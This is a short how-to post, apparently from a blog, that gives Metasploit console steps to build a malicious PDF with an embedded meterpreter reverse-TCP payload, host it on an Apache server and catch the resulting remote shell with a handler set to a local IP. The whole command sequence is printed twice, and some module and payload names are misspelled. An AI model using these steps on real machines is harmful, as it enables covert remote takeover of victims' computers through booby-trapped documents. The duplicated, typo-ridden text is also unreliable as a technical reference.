Today I share how hack windows machine using metasploit for creating malicious PDF.
First. Open terminal and type
-sudo msfconsole
-use exploit windows/file format/adobe_pdf_embedded_exe
-show options
-set payload windows/x64/meterpreter/reverce_tcp
-ip addr
-show options
When PDF created
- exploit
For hosting this malicious pdf
- sudo mv /root/.msf4/local/embedded.pdf /var/www/html/embedded.pdf
Start server
-sudo systemctl start apache2.service
Check server statut
-sudo systemctl status apache2.service
we need to full access to the server
-use exploit/multi/handler
-set payload windows/x64/meterpreter/reverse_tcp
-show options
-set Lhost 192.168.0.106
-exploit
***booom***
First. Open terminal and type
-sudo msfconsole
-use exploit windows/file format/adobe_pdf_embedded_exe
-show options
-set payload windows/x64/meterpreter/reverce_tcp
-ip addr
-show options
When PDF created
- exploit
For hosting this malicious pdf
- sudo mv /root/.msf4/local/embedded.pdf /var/www/html/embedded.pdf
Start server
-sudo systemctl start apache2.service
Check server statut
-sudo systemctl status apache2.service
we need to full access to the server
-use exploit/multi/handler
-set payload windows/x64/meterpreter/reverse_tcp
-show options
-set Lhost 192.168.0.106
-exploit
***booom***